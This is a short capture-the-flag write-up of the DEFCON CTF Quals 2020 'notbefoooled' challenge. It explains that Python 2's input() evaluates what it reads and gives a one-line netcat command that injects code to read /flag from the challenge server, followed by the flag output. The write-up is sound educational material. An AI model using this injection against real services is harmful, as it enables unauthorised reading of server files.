DEFCON CTF Quals 2020: notbefoooled

crypto (143 points, 30 solves)

This task was about the additive transfer attack on elliptic curves, which seemed very interesting, but unfortunately no math was needed to solve it.

Here’s the only relevant part of the task script (written in sage):

def input_int(msg):
    s = input(msg)
    return int(s)

Knowing that sage only recently switched to Python3 and the server might still be running an older version, we tried exploiting one of Python2’s most dangerous footguns, namely the extremely inappropriately named input() function. As the name suggests, this function reads some input — and then eval()s it. (WTF?!)

Thus, the full solution for this “crypto” task reads:

echo "sys.stdout.write(open('/flag').read())" | nc notbefoooled.challenges.ooo 5000

…which printed the flag:

 _   _   _                                                    
/ \ / \ / \         _. ._  ._   _.   _|_  _  | |       _      
\_/ \_/ \_/   \/\/ (_| | | | | (_|    |_ (/_ | |   \/ (_) |_| 
                                                   /          
                                                  _                            
|_   _         _|_  _    ._   _ _|_   |_   _    _|_ _   _   _  |  _   _|       
| | (_) \/\/    |_ (_)   | | (_) |_   |_) (/_    | (_) (_) (_) | (/_ (_| o o o 
                                                                               

Give me the coefficients of your curve in the form of y^2 = x^3 + ax + b mod p with p greater than 34920416236737110998395687449456648500919195721094085737289299988672:
	a = OOO{be_Smarter_like_you_just_did}